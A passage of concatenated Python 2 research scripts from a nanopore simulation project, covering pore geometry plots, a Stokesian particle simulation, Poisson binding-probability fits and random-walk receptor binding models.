nanopores.savefigs("rw_cyl", folders.FIGDIR + "/pugh", ending=".pdf")
```
#### File: scripts/random_walk_aHem/plot_aHem.py
```python
import matplotlib.pyplot as plt
import numpy as np
from aHem_array_2d import *
a=np.load('hbond.npy')
def radius(x,y):
return sqrt(x**2+y**2)
def det(a,b,c,d):
return a*d-b*c
size=X_aHem_2d.shape[0]
hbond=X_aHem_2d
A=0
for i in range(size):
A+=(hbond[i-1][0]*hbond[i][1]-hbond[i][0]*hbond[i-1][1])
A*=-0.5
print A
Cx=0
Cy=0
for i in range(size):
Cx+=(hbond[i-1][0]+hbond[i][0])*(hbond[i-1][0]*hbond[i][1]-hbond[i][0]*hbond[i-1][1])
Cy+=(hbond[i-1][1]+hbond[i][1])*(hbond[i-1][0]*hbond[i][1]-hbond[i][0]*hbond[i-1][1])
Cx*=1./(6*A)
Cy*=1./(6*A)
shift=np.array([[Cx,Cy] for i in range(size)])
hbond=hbond+shift
hbond2=hbond*1.2
#hbond=hbond-shift
leftend=10.
x_mem=np.linspace(X_aHem_2d[18][0],leftend,100)
y_mem=np.zeros(x_mem.shape[0])+X_aHem_2d[18][1]
X=np.zeros(size+1)
Y=np.zeros(size+1)
X_=np.zeros(a.shape[0]+1)
Y_=np.zeros(a.shape[0]+1)
for index in range(size):
X[index]=X_aHem_2d[index][0]
Y[index]=X_aHem_2d[index][1]
for index in range(a.shape[0]):
X_[index]=a[index][0]
Y_[index]=a[index][1]
X[size]=X[0]
Y[size]=Y[0]
X_[a.shape[0]]=X_[0]
Y_[a.shape[0]]=Y_[0]
#fig=plt.figure(figsize=(5.7,11), dpi=400)
plt.plot(X,Y,linewidth='2',color='blue')
plt.scatter(X,Y,50,color='blue')
plt.plot(X_,Y_,linewidth=2,color='green')
plt.scatter(X_,Y_,50,color='green')
plt.plot(x_mem,y_mem,color='black',linewidth=1)
#plt.scatter([0.,0.,2.,2.],[0.,-2.,-2.,0.],50,color='red')
#plt.savefig('array.png')
plt.show()
```
#### File: scripts/stokesian/simulation.py
```python
import numpy as np
from nanopores import kT, eta, eperm, qq, rpermw, HOME
from matplotlib import pyplot as plt
#from matplotlib import patches
import matplotlib.animation as animation
from matplotlib import collections
from functools import partial
#import matplotlib
#matplotlib.use("Agg")
class Particle(object):
def __init__(self, x, a, charge=0., color="blue"):
self.x = np.reshape(np.array(x), (-1, 1))
self.a = a
self.circle = None
self.charge = charge
self.color = color
#
# def add_patch(self, ax):
# self.circle = patches.Circle(xy=self.x[::2], radius=self.a)
# ax.add_patch(self.circle)
#
# def patch(self):
# self.circle = patches.Circle(xy=self.x[::2], radius=self.a)
# return self.circle
def move(self, dx):
self.x = self.x + np.array(dx).reshape(-1, 1)
# if self.circle is not None:
# self.circle.center = self.x[::2]
class Plane(object):
def __init__(self, p, n): # outer normal vextor and one point on plane
self.n = np.array(n).reshape(1, 3)
self.p = np.array(p).reshape(1, 3)
def reflect(self, P):
# reflect all points in P downwards that lie above plane
# ("above" is direction of normal vector)
x = np.array([p.x.flatten() for p in P])
# n * (x - p) > 0
excess = np.dot(x - self.p, self.n.T)
above = (excess > 0).flatten()
dx = np.zeros_like(x)
dx[above, :] = (-2.*excess*self.n)[above, :]
for i, p in enumerate(P):
if above[i]:
p.move(dx[i, :])
class Box(object):
# reflect to be inside box
def __init__(self, x0, Lx, Ly, Lz):
ex = np.eye(1, 3, 0)
ey = np.eye(1, 3, 1)
ez = np.eye(1, 3, 2)
x0 = np.array(x0).reshape(1, 3)
self.planes = [Plane(x0, -ex), Plane(x0 + Lx*ex, ex),
Plane(x0, -ey), Plane(x0 + Ly*ey, ey),
Plane(x0, -ez), Plane(x0 + Lz*ez, ez)]
def reflect(self, P):
for plane in self.planes:
plane.reflect(P)
def msqrt(M): # matrix square root
#U, S, V = np.linalg.svd(M)
#return np.dot(U, np.dot(np.diag(np.sqrt(S)), V))
return np.linalg.cholesky(M)
# external force: constant electrical field
def f_extern(p):
#return np.zeros_like(p.x)
a = 0e-14
#b = 1e-26
f = np.zeros_like(p.x)
f[2, :] = -a*p.a**3 #+ b*(p.x[2, :] - 1.)**(-7)
return f
def f_brownian(p):
rand = np.random.randn(*p.x.shape)
rand[1] = 0.
return rand
def RR(R):
#R = np.reshape(R, (-1, 1))
r = np.linalg.norm(R)
return np.matrix(R * R.T / r**2)
def mobility_pp(p1, p2): # D/kT
a1 = 1e-9*p1.a
a2 = 1e-9*p2.a
R = 1e-9*p1.x - 1e-9*p2.x
r = np.linalg.norm(R)
I = np.matrix(np.eye(3))
if r <= abs(a1 - a2):
return 1./(6.*np.pi*eta*max(a1, a2)) * I
elif r <= a1 + a2:
A = 0.5*(a1 + a2) - ((a1-a2)**2 + 3.*r**2)**2/(32.*r**3)
B = 3.*((a1-a2)**2 - r**2)**2/(32.*r**3)
return 1./(6.*np.pi*eta*a1*a2) * (A*I + B*RR(R))
else:
a = a1**2 + a2**2
A = 1. + a/(3.*r**2)
B = 1. - a/r**2
return 1./(8.*np.pi*eta*r) * (A*I + B*RR(R))
def mobility_vectorized(P):
# return matrix mobility(pi, pj)_kl where kl are the space coordinates
# is, at the moment, list of particles
# TODO: need pure numerical representation !!!!!!!!!!!!1111
n = len(P)
M = np.matrix(np.zeros((3*n, 3*n)))
for i, p in enumerate(P):
for j, q in enumerate(P):
M[i::n, j::n] = mobility_pp(p, q)
return M
def mobility(P):
# nice: M is of the form Mijkl = Aij * Ikl + Bij * Rijkl
# where Ikl, Rijkl are easily formed
# obtain vector representations of positions, radii
n = len(P)
a = 1e-9*np.array([p.a for p in P])
x = 1e-9*np.array([p.x.flatten() for p in P])
rr = np.sum((x[:, None, :] - x[None, :, :])**2, 2) + 1e-100
r = np.sqrt(rr)
A = np.zeros_like(r)
B = np.zeros_like(r)
ama = a[:, None] - a[None, :]
apa = a[:, None] + a[None, :]
asq = a[:, None]**2 + a[None, :]**2
case1 = r <= np.abs(ama)
A[case1] = (1./(6.*np.pi*eta*np.maximum(a[:,None], a[None,:])))[case1]
B[case1] = 0.
case2 = ~case1 & (r <= apa)
C = 1./(6.*np.pi*eta*a[:, None]*a[None, :])
A[case2] = (C*(0.5*apa - (ama**2 + 3.*r**2)**2/(32.*r**3)))[case2]
B[case2] = (C*(3.*(ama**2 - r**2)**2/(32.*r**3)))[case2]
case3 = ~(case1 | case2) # else
C = 1./(8.*np.pi*eta*r)
A[case3] = (C*(1. + asq/(3.*r**2)))[case3]
B[case3] = (C*(1. - asq/r**2))[case3]
I = np.eye(3)
R = (x[:, None, :] - x[None, :, :])
RR = (R[:, :, :, None] * R[:, :, None, :]).transpose(2, 0, 3, 1)
RR = RR / (rr[None, :, None, :])
M = (A[None, :, None, :] * I[:, None, :, None]).reshape(3*n, 3*n) + \
(B[None, :, None, :] * RR).reshape(3*n, 3*n)
return np.matrix(M)
def f_vectorized(P, f):
n = len(P)
F = np.zeros((3*n, 1))
for i, p in enumerate(P):
F[i::n] = f(p)
return F
def f_electric(P):
n = len(P)
a = 1e-9*np.array([p.a for p in P])
apa = a[:, None] + a[None, :]
x = 1e-9*np.array([p.x.flatten() for p in P])
R = x[:, None, :] - x[None, :, :]
r = np.sqrt(np.sum(R**2, 2) + 1e-100)
R0 = R / (r**3)[:, :, None]
q = np.array([float(p.charge) for p in P])
const = qq**2 / (4.*np.pi*eperm*rpermw)
QQ = q[:, None] * q[None, :]
F = const * QQ[:, :, None] * R0
#F[np.diag_indices_from(r)] = 0.
tooclose = r <= apa
R0i = R / (np.maximum(a[:, None], a[None, :])**3)[:, :, None]
F[tooclose] = (const * QQ[:, :, None] * R0i)[tooclose]
f = np.sum(F, 1).T.reshape(3*n, 1)
return f
def f_shortrange(P):
n = len(P)
a = 1e-9*np.array([p.a for p in P])
apa = a[:, None] + a[None, :]
x = 1e-9*np.array([p.x.flatten() for p in P])
R = x[:, None, :] - x[None, :, :]
r = np.sqrt(np.sum(R**2, 2)) + 1e-100
#E0 = apa*1e9*10.*kT # total energy required for r = apa*1.1 --> r = 0
#E = E0*((r/apa/1.1 - 1.)**2)
E0 = 1e9*1e1*kT
cutoff = 1.05
f = 2./cutoff*E0*np.maximum(1. - r/apa/cutoff, 0.)
R0 = R / r[:, :, None]
F = f[:, :, None] * R0
ff = np.sum(F, 1).T.reshape(3*n, 1)
return ff
def simulation(P, T=100., dt=1.):
t = 0.
while t < T:
# calculate forces
force = f_electric(P) + f_shortrange(P)
brownian = f_vectorized(P, f_brownian)
M = mobility(P)
sqM = np.matrix(msqrt(M))
# determine resulting velocities
U = M*force + np.sqrt(2.*kT/dt*1e9)*sqM*brownian
n = len(P)
# move particles
for i, p in enumerate(P):
u = U[i::n]
p.move(dt*u)
yield t
t += dt
# static particles: no forces act on them, are not affected by
#from time import time
def move(P, dt=1., boundaries=()):
# calculate forces
force = f_electric(P) + f_shortrange(P)
brownian = f_vectorized(P, f_brownian)
#t = time()
M = mobility(P)
#print "forming mobility", time() - t
#t = time()
sqM = np.matrix(msqrt(M))
#print "matrix square root", time() - t
# determine resulting velocities
Udet = M*force
Ubro = np.sqrt(2.*kT/dt*1e9)*sqM*brownian
#U = M*force + np.sqrt(2.*kT/dt*1e9)*sqM*brownian
U = Udet + Ubro
#print "P0:", Udet[0], Ubro[0]
#print "P1:", Udet[1], Ubro[1]
#print
n = len(P)
# move particles
for i, p in enumerate(P):
u = U[i::n]
p.move(dt*u)
for b in boundaries:
b.reflect(P)
class ParticleCollection(object):
def __init__(self, particles=None):
if particles is None:
particles = []
self.P = particles
def add(self, generate, N):
i = 0
while i < N:
p0 = generate()
if all(np.linalg.norm(q.x - p0.x) > p0.a + q.a for q in self.P):
self.P.append(p0)
i += 1
def ellipse_collection(ax, P):
xy = np.array([p.x[::2].flatten() for p in P])
sizes = np.array([p.a for p in P])
coll = collections.EllipseCollection(sizes, sizes, np.zeros_like(sizes),
offsets=xy, units='x', facecolors=[p.color for p in P],
transOffset=ax.transData, alpha=0.7)
return coll
def panimate(ax, dt, pcoll, patches, boundaries, **kwargs):
particles = pcoll.P
coll = ellipse_collection(ax, particles)
def init():
return ()
#ax.clear()
#ax.add_patch(rect)
#return (rect, )
def animate(i):
if i == 0:
for patch in patches:
ax.add_patch(patch)
ax.add_collection(coll)
else:
move(particles, dt, boundaries)
xy = np.array([p.x[::2].flatten() for p in particles])
coll.set_offsets(xy)
return tuple(patches + [coll])
kwargs = dict(dict(frames=1800, interval=10, blit=True), **kwargs)
ani = animation.FuncAnimation(ax.figure, animate, init_func=init, **kwargs)
return ani
def maybe_save(do_save, ani, name):
if do_save:
ani.save(HOME + "/presentations/anaday17/" + name, fps=30, dpi=200,
writer="ffmpeg_file",
savefig_kwargs={"bbox_inches":0, "pad_inches":0},
extra_args=['-vcodec', 'libx264'])
else:
plt.show()
def random_particle(L, *args, **kwargs):
x = [(2*np.random.rand() - 1.)*L, 0., (2*np.random.rand() - 1.)*L]
return Particle(x, *args, **kwargs)
def setup_box(L):
# ax, patches, boundaries = setup_box(L)
fig = plt.figure()
fig.set_size_inches(6, 6)
ax = plt.axes([0,0,1,1], autoscale_on=False,
xlim=(-L, L), ylim=(-L, L))
ax.set_axis_off()
rect = plt.Rectangle([-L, -L], 2*L, 2*L, ec='k', lw=3, fc='none')
box = Box([-L, -L, -L], 2*L, 2*L, 2*L)
return ax, [rect], [box]
```
#### File: scripts/wei/digamma.py
```python
import numpy as np
from scipy.special import digamma
from scipy.stats import poisson, gamma
from matplotlib import pyplot as plt
euler = 0.577215664901532
t = np.linspace(0, 10, 1000)
plt.plot(t, t*np.exp(t)/np.expm1(t))
plt.show()
exit()
#plt.plot(t, digamma(t))
#plt.plot(t, np.log(t/(1 - np.exp(-t))), ".-")
#
def summand(k, b):
return digamma(k)*poisson.pmf(k, b)
def f(b, N=50):
k = np.arange(1, N)
return np.sum(summand(k, b))*1./np.expm1(b) - np.log(b*np.exp(b)/np.expm1(b))
def finv(x):
return x/euler + 1
#plt.plot(t, [(f(x) + euler - x*euler + 0.74694*x**2 - 0.336*x**3) for x in t], ".-")
plt.plot(t, [finv(f(x)) for x in t], ".-")
plt.plot(t, t)
#plt.figure()
k = np.arange(1, 20)
#plt.plot(k, summand(k, 0.01), "s--")
plt.show()
```
#### File: scripts/wei/newton.py
```python
import numpy as np
def solve(C, f, f1, x0=1., n=20):
"solve f(x) == C"
x = x0 # initial value
print "Newton iteration:"
for i in range(n):
dx = -(f(x) - C)/f1(x)
x = x + dx
print i, "Residual", f(x) - C, "Value", x
print
return x
def poisson_from_positiveK(mean):
# solve x/(1 - exp(-x)) == mean
def f(x):
return x/(1. - np.exp(-x))
def f1(x):
return (np.expm1(x) - x)/(2.*np.cosh(x) - 2.)
x = solve(mean, f, f1, mean, n=10)
return x
```
#### File: scripts/wei/plot_binding_probability.py
```python
import numpy as np
from matplotlib import pyplot as plt
from matplotlib.patches import Rectangle
import nanopores
from find_binding_probability import (binding_prob,
binding_prob_from_data, invert_monotone)
# load data
P2 = np.linspace(0, 1, 100)
P2a = P2[P2 > 0.05]
data2 = binding_prob(P2, nproc=5, calc=False, N=20000)
data2a = binding_prob(P2a, nproc=5, calc=False, N=20000)
P3 = np.linspace(0, 0.05, 10)
data3 = binding_prob(P3, nproc=5, calc=False, N=100000)
P4a = np.linspace(0.01, 0.5, 20)
data4a = binding_prob(P4a, nproc=5, calc=False, N=4000)
P4 = np.linspace(0.01, 0.5, 20)
data4 = binding_prob(P4, nproc=5, calc=True, N=100000)
a = 0.3 # mean number of attempts
a1 = 2.2
p0 = binding_prob_from_data()
p = invert_monotone(p0, P3, data3.p0)
pmod = a/a1
#pmod = p0/(1. - np.exp(-a1*p))
# big plot
plt.figure("p0")
plt.plot(P2, data2.p0, ".", label="Simulated (N=20000)")
PP = np.linspace(0, 1, 500)
plt.plot(PP, 1. - np.exp(-a*PP), label="Poisson")
plt.xlabel(r"$p$")
plt.ylabel(r"$p_0$") #probability of >= 1 binding")
plt.legend(frameon=False)
# smaller plot where p is inferred
plt.figure("p0_small")
#plt.plot(P2, data2.p0, "o", label="Simulated (N=20000)", zorder=100)
plt.plot(P3, data3.p0, "o", label="Simulated (N=100000)", zorder=100)
PP = np.linspace(0, 1, 500)
plt.plot(PP, 1. - np.exp(-0.3*PP), label="Poisson (a = 0.3)")
plt.plot(PP, pmod*(1. - np.exp(-a1*PP)), label="Mod. Poisson (a = 2.2)")
plt.plot([0, 1], [p0, p0], "k--", label="p0 from data")
plt.plot([p], [p0], "o", color="#000000", label="inferred p = %.3f" % p, zorder=100)
#plt.axvline(x=p, ymin=0., ymax=p0/0.025, color="#000000", zorder=-90)
plt.xlim(-0.002, 0.062)
plt.ylim(-0.001, 0.023)
plt.yticks([0, .005, .01, .015, .02])
plt.xlabel(r"Binding probability $p$")
plt.ylabel(r"$p_0$") #probability of >= 1 binding")
plt.legend(frameon=False)
# big plot
plt.figure("p0_fit")
plt.plot(P2, data2.p0, ".", label="Simulated (N=20000)", zorder=100)
PP = np.linspace(0, 1, 500)
plt.plot(PP, 1. - np.exp(-a*PP), label="Poisson (a = 0.3)")
plt.plot(PP, pmod*(1. - np.exp(-a1*PP)), label="Mod. Poisson (a = 2.2)")
print "pmod", pmod
plt.xlabel(r"Binding probability $p$")
plt.ylabel(r"$p_0$") #probability of >= 1 binding")
plt.gca().add_patch(Rectangle((-0.01, -0.002), 0.07, 0.02, fc="none", ec="k"))
plt.legend(frameon=False)
import folders
nanopores.savefigs("binding_prob", folders.FIGDIR + "/wei", (4, 3))
print "binding prob. inferred from simulations: p = %.6f" % p
ap = -np.log(1 - p0)
p1 = ap/a
print "binding prob. inferred from assumed Poisson distribution: p = %.6f" % p1
# plot mean, std, log of time
plt.figure("time_stdmean")
mu = np.array(data4.mean_time)
sigma = np.array(data4.std_time)
log = np.array(data4.mean_log_time)
plt.plot(P4, (mu/sigma)**2, "o", label="Simulated (N=100000)")
def f(x):
return np.exp(x)/(2.*np.expm1(x)/x - 1.)
plt.plot(P4, f(a*P4), label="Poisson (a = %.1f)" % a)
plt.plot(P4, f(a1*P4), label="Mod. Poisson (a = %.1f)" % a1)
plt.legend(frameon=False)
plt.figure("time_log")
euler = 0.577215664901532
theta = -0.573810187498/euler + 1. # estimate from histogram
plt.plot(P4, (log - np.log(mu))/euler + 1., "o", label="Simulated (N=100000)")
plt.plot(P4, np.ones_like(P4)*theta, "--k", label="Estimate from histogram")
from scipy.special import digamma
from scipy.stats import poisson
def summand(k, b):
return digamma(k)*poisson.pmf(k, b)
def f1(b, N=50):
k = np.arange(1, N)
return np.sum(summand(k, b))*1./np.expm1(b) - np.log(b*np.exp(b)/np.expm1(b))
def f1v(x):
return np.array([f1(b) for b in x])
plt.plot(P4, f1v(a*P4)/euler + 1., label="Poisson (a = %.1f)" % a)
plt.plot(P4, f1v(a1*P4)/euler + 1., label="Mod. Poisson (a = %.1f)" % a1)
plt.xlabel("p")
plt.legend(frameon=False)
plt.figure("time_mean")
#tau = 3.7
tau = 3.88
P4a = np.linspace(0, 0.15, 500)
def g(x):
return x/(1. - np.exp(-x))
def taufit(a):
return tau/g(a*p)
plt.plot(P4, 1e-9*taufit(a1)/tau*mu, "o", label="Simulated (N=100000)", zorder=100)
plt.plot(P4a, tau*np.ones_like(P4a), "--", color="orange", label="Const., tau = %.2f" % tau)
plt.plot(P4a, taufit(a)*g(a*P4a), label="Poisson, tau = %.2f" % (taufit(a)), color="C1")
plt.plot(P4a, taufit(a1)*g(a1*P4a), label="Mod. Poisson, tau = %.2f" % (taufit(a1)), color="C2")
plt.plot([p], [tau], "o", color="#000066", label=r"p, tau off from data")
#lima, limb = plt.ylim()
#plt.axvline(x=p, ymin=0., ymax=(tau - lima)/(limb - lima), color="#000066", zorder=-90)
plt.xlim(-0.004, 0.154)
plt.ylim(3.6, 4.8)
plt.xlabel(r"Binding probability $p$")
plt.ylabel(r"Mean $\tau$ off [s]")
plt.legend(loc="upper left", frameon=False)
plt.figure("time_std")
sig = 4.02
def h(x):
return np.sqrt(g(x)*(2. - x/np.expm1(x)))
def sigfit(a):
return sig/h(a*p)
plt.plot(P4, 1e-9*sigfit(a1)/tau*sigma, "o", label=r"Simulated (N=100000)")
plt.plot(P4, sigfit(a)*h(a*P4), label=r"Poisson (a = %.1f, $\tau$ = %.2f)" % (a, sigfit(a)))
plt.plot(P4, sigfit(a1)*h(a1*P4), label=r"Mod. Poisson (a = %.1f, $\tau$ = %.2f)" % (a1, sigfit(a1)))
plt.plot(P4, sig*np.ones_like(P4), "--", color="orange", label=r"Exponential ($\tau$ = %.2f)" % sig)
plt.plot([p], [sig], "o", color="#000066", label="p, sigma inferred from data")
#lima, limb = plt.ylim()
#plt.axvline(x=p, ymin=0., ymax=(tau - lima)/(limb - lima), color="#000066", zorder=-90)
plt.xlabel("p")
plt.ylabel("std. dev. of binding duration [s]")
plt.legend(frameon=False)
import folders
nanopores.savefigs("tau", folders.FIGDIR + "/wei", (5, 3.7))
#plt.show()
```
#### File: scripts/wei/run_wei.py
```python
import numpy as np
from matplotlib import rcParams, rc
rcParams.update({
"font.size" : 7,
"axes.titlesize" : 7,
"font.family" : "sans-serif",
"font.sans-serif" : ["CMU Sans Serif"],
"lines.linewidth" : 1,
"lines.markersize" : 5,
})
import matplotlib.pyplot as plt
from matplotlib.legend_handler import HandlerTuple
import nanopores
import nanopores.models.randomwalk as randomwalk
from nanopores.tools import fields
fields.set_dir_mega()
from nonlinear_least_squares import NLS
# TODO: to finish this off satisfactorily, it would be nice to infer a tau on
# histogram from exponentially distributed arrivals at the pore entrance
# according to diffusion theory
params = nanopores.user_params(
# general params
geoname = "wei",
dim = 2,
rMolecule = 1.25, # 6.
h = 5.,
Nmax = 1e5,
Qmol = 2., #15.,
bV = -0.2,
dp = 26.,
geop = dict(dp = 26.),
posDTarget = True,
# random walk params
N = 100000, # number of (simultaneous) random walks
dt = .5, # time step [ns]
walldist = 2., # in multiples of radius, should be >= 1
margtop = 60.,
margbot = 0.,
#zstart = 46.5, # 46.5
#xstart = 0., # 42.
rstart = 30,
initial = "sphere",
# receptor params
tbind = 40e9, # from Lata, = 1/kd = 1/(25e-3)s [ns]
# tbind = 286e9, from Wei, = 1/kd = 1/(3.5e-3)s [ns]
ka = 1.5e5,
zreceptor = .95, # receptor location relative to pore length (1 = top)
)
##### what to do
NAME = "rw_wei_"
print_calculations = False
run_test = False
plot_attempt_time = True
plot_distribution = False
plot_cdf = False
voltage_dependence = True
determine_delta = False
fit_koff0 = False
##### constants
rrec = 0.5 # receptor radius
distrec = 4. - params.rMolecule - rrec # distance of rec. center from wall
ra = distrec #params.rMolecule*(params.walldist - 1.) - rrec
dx = 5.5
kd = 25e-3
#### color code
color_lata = "C0" #"#0066ff"
color_wei = "#00cc00"
color_exp = "red"
def receptor_params(params):
dx0 = params["dx"] if "dx" in params else dx
kd0 = params["kd"] if "kd" in params else kd
tbindfromkd = 1e9/kd0
tbind0 = params["tbind"] if "tbind" in params else tbindfromkd
return dict(
exclusion = False,
walldist = 1.,
#minsize = 0.01, # accuracy when performing reflection
binding = True,
t = tbind0, # mean of exponentially distributed binding duration [ns]
#t = 1e9/kd0,
ka = params["ka"], # (bulk) association rate constant [1/Ms]
ra = ra, # radius of the association zone [nm]
bind_type = "zone",
collect_stats_mode = True,
use_force = True, # if True, t_mean = t*exp(-|F|*dx/kT)
dx = dx0, # width of bond energy barrier [nm]
)
if print_calculations:
phys = nanopores.Physics()
# calculate binding probability with data from (Wei 2012)
kon = 20.9e6 # association rate constant [1/Ms] = binding events per second
c = 180e-9 # concentration [M = mol/l = 1000 mol/m**3]
cmol = c * 1e3 * phys.mol # concentration [1/m**3]
ckon = c*kon
print "Average time between events (tau_on): %.2f s (from experimental data)" % (1./ckon)
print "Number of bindings per second: %.1f (inverse of mean tau_on)" % ckon # 3.8
# Smoluchowski rate equation gives number of arrivals at pore entrance per sec
D = phys.kT / (6. * phys.pi * phys.eta * params.rMolecule * 1e-9) # [m**2/s]
r = 6e-9 # effective radius for proteins at pore entrance [m]
karr = 2.*phys.pi * r * D * cmol # arrival rate
b = c * kon / karr # bindings per event
print "Number of events per second: %.1f (from Smoluchowski rate equation)" % karr
print "=> number of bindings per event: %.1f / %.1f = %.5f (= 1 - exp(-a*p) = prob of binding at least once)" % (ckon, karr, b)
# solve b = 1 - exp(-ap); p = -log(1 - b)/a
a = 0.305
ap = -np.log(1 - b)
p = ap/a
print "=> a*p = -log(1 - %.5f) = %.5f" % (b, ap)
print
print "Average number of attempts: a = %.5f (from many simulations with dt=1, eps=0.1)" % a
print "=> binding probability p = a*p / a = %.5f / %.5f = %.5f" % (ap, a, p)
#receptor_params["p"] = p
def setup_rw(params):
pore = nanopores.get_pore(**params)
rw = randomwalk.RandomWalk(pore, **params)
zrec = rw.zbot + rrec + (rw.ztop - rw.zbot - 2.*rrec)*params["zreceptor"]
xrec = pore.radius_at(zrec) - distrec
posrec = [xrec, 0., zrec]
print "Receptor position: %s" % posrec
receptor = randomwalk.Ball(posrec, rrec) # ztop 46.5
rw.add_domain(receptor, **receptor_params(params))
return rw
##### run test rw
if run_test:
rw = setup_rw(params)
randomwalk.run(rw)
##### draw bindings and forces from empirical distribution
def draw_empirically(rw, N=1e8, nmax=1000, success=True):
self = rw.domains[1]
N = int(N)
ka = self.kbind
# draw indices of existing random walks
I = np.random.randint(rw.N, size=(N,))
times = (1e-9*rw.times)[I]
bindings = np.zeros(N, dtype=bool)
avgbindings = (ka*rw.attempt_times)[I]
bindings[avgbindings > 0] = np.random.poisson(avgbindings[avgbindings > 0])
del avgbindings
ibind, = np.nonzero(bindings > 0)
n0 = len(ibind)
n = min(n0, nmax)
ibind = ibind[:n]
print "%d binding events drawn, %s used." % (n0, n)
f = np.array([f for F in rw.binding_zone_forces for f in F])
F = np.random.choice(f, size=(n,))
dx = 1e-9*self.dx
kT = rw.phys.kT
t = self.t * np.exp(-F*dx/kT)
print "dwell time reduction by force:", np.mean(t)/self.t
bind_times = 1e-9*np.random.gamma(bindings[ibind], scale=t)
times[ibind] += bind_times
if success:
tfail = times[rw.fail[I]]
tsuccess = times[rw.success[I]]
return tfail, tsuccess
else:
return times[ibind]
##### load tau_off histogram from source and create fake data
def tauoff_wei():
csvfile = "tau_off_wei.csv"
data = np.genfromtxt(csvfile, delimiter=",")
bins = data[:, 0]
counts = data[:, 1]
# inspection showed that there seems to be a good,
# evenly spaced approximation to all bins except the first and last with
# spacing 0.55, i.e. of the form (beta + 0.55*np.arange(0, N)) for some beta
x = bins[:-1]
N = len(x)
# minimize norm(x - (beta + 0.55*np.arange(0, N)) w.r.t. beta
#beta = x.mean() - 0.55*(N-1)/2.
# turns out beta is close to 0.25, which gives nice numbers,
# so we will just take that
bins = 0.25 + 0.55*np.arange(0, N)
bins = [0.] + list(bins) + [20.]
N = N+1
# the counts should be integer-values, so
counts = np.round(counts).astype(int)
# TODO: need better experimental data => webtool
# create fake data samples that reproduce the histogram
fake = np.array([])
frac = 1.
while int(counts[0]*frac) > 1:
frac /= 2.
a, b = bins[1]*frac, bins[1]*2*frac
sample = a*(b/a)**(np.random.rand(int(counts[0]*frac)))
fake = np.append(fake, sample)
#print "frac", frac
for i in range(1, N):
a, b = bins[i], bins[i+1]
sample = a*(b/a)**(np.random.rand(counts[i]))
fake = np.append(fake, sample)
print len(fake), "events loaded from experimental data."
return fake
###### determine tauoff from fit to exponential cdf 1 - exp(t/tauoff)
@fields.cache("wei_koff_2", default=dict(params, dx=5.5, N=10000,
dp=30., geop=dict(dp=30.), nmax=523, NN=4e8))
def fit_koff(nmax=523, NN=4e8, **params):
tbind = params.pop("tbind")
params["kd"] = 1e9/tbind
dx = params.pop("dx")
rw = randomwalk.get_rw(NAME, params, setup=setup_rw, calc=True)
rw.domains[1].dx = dx
times = draw_empirically(rw, N=NN, nmax=nmax, success=False)
bins = np.logspace(np.log10(min(times)), np.log10(max(times)), 35)
#bins = np.logspace(-3., 2., 35)
hist, _ = np.histogram(times, bins=bins)
cfd = np.cumsum(hist)/float(np.sum(hist))
t = 0.5*(bins[:-1] + bins[1:])
tmean = times.mean()
toff = NLS(t, cfd, t0=tmean)
koff = 1./toff
return dict(t=t, cfd=cfd, toff=toff, tmean=tmean, koff=koff)
if plot_attempt_time:
rw = randomwalk.get_rw(NAME, params, setup=setup_rw)
ta = rw.attempt_times
ta = ta[ta > 0.]
#tt = np.logspace(-.5, 2.5, 100)
tt = np.linspace(0.25, 200., 100)
plt.figure("attempt_times", figsize=(2.2, 1.65))
plt.hist(ta, bins=tt, normed=True, log=True, label="Simulations")
ta0 = ta.mean()
plt.plot(tt, 1./ta0 * np.exp(-tt/ta0), label="Exp. fit, mean %.3gns" % ta0)
#plt.xscale("log")
#plt.yscale("log")
plt.xlabel("Attempt time [ns]")
plt.ylabel("Rel. frequency")
handles, labels = plt.gca().get_legend_handles_labels()
plt.legend(handles[::-1], labels[::-1], frameon=False)
##### run rw in collect mode and draw bindings from empirical distributions
if plot_distribution:
rw = randomwalk.get_rw(NAME, params, setup=setup_rw)
ta = rw.attempt_times
ta = ta[ta > 0.]
#tt = np.logspace(-.5, 2.5, 100)
tt = np.linspace(0.25, 200., 100)
plt.figure("attempt_times", figsize=(4, 3))
plt.hist(ta, bins=tt, normed=True, log=True, label="Simulations")
ta0 = ta.mean()
plt.plot(tt, 1./ta0 * np.exp(-tt/ta0), label="Exp. fit, mean=%.3gns" % ta0)
#plt.xscale("log")
#plt.yscale("log")
plt.xlabel("Attempt time [ns]")
plt.ylabel("Rel. frequency")
plt.legend()
forces = np.array([f for F in rw.binding_zone_forces for f in F])
plt.figure("force", figsize=(4,3))
plt.hist(1e12*forces, bins=200, normed=True)
plt.xlabel("Force [pN]")
plt.ylabel("Rel. frequency")
plt.figure("hist_old", figsize=(4.5,3))
NN = 3e8
fake = tauoff_wei()
tfail, tsuccess1 = draw_empirically(rw, N=NN, nmax=len(fake))
a, b = -6.5, 2 # log10 of plot interval
bins = np.logspace(a, b, 40)
_, _, gptchs = plt.hist(tsuccess1, bins=bins, color="green", log=True,
alpha=0.6, rwidth=0.9, label=r"Translocated ($k_d$: Lata)", zorder=50)
_, _, rptchs = plt.hist(tfail, bins=bins, color="red", log=True,
alpha=0.6, rwidth=0.9, label=r"Did not translocate ($k_d$: Lata)")
handler_sim1 = (gptchs[0], rptchs[0])
# add histogram for kd fitted from wei
params2 = dict(params)
tbind = params2.pop("tbind")
params2["kd"] = 3.5e-3
rw = randomwalk.get_rw(NAME, params2, setup=setup_rw)
tfail, tsuccess2 = draw_empirically(rw, N=NN, nmax=len(fake))
_, _, gptchs = plt.hist(tsuccess2, bins=bins, color="green", log=True,
histtype="step", linestyle="--", alpha=0.6,
rwidth=0.9, label=r"Translocated ($k_d$: Wei)", zorder=200)
_, _, rptchs = plt.hist(tfail, bins=bins, color="red", log=True,
histtype="step", linestyle="--", alpha=0.6,
rwidth=0.9, label=r"Did not translocate ($k_d$: Wei)")
handler_sim2 = (gptchs[0], rptchs[0])
_, _, ptchs = plt.hist(fake, bins=bins, histtype="step", log=True,
color="orange", label="Experiments", zorder=100)
handler_exp = ptchs[0]
plt.xscale("log")
#plt.yscale("log")
plt.ylabel("Count")
plt.xlabel(r"$\tau$ off [s]")
plt.ylim(ymin=1.)
#plt.xlim(xmax=1e4)
#plt.legend()
plt.legend([handler_exp, handler_sim1, handler_sim2],
["Experiments", r"Sim. ($k_d$ from Lata)", r"Sim. ($k_d$ from Wei)"],
#plt.legend([handler_exp, handler_sim1],
# ["Experiments (Wei et al.)", r"Sim. ($k_d$ from Lata)"],
handler_map={tuple: HandlerTuple(ndivide=None)},
frameon=False)
#scatterpoints=1, numpoints=1,
# simpler hist with better color code and visibility
tsuccess_lata = tsuccess1#[tsuccess1 > 1e-4]
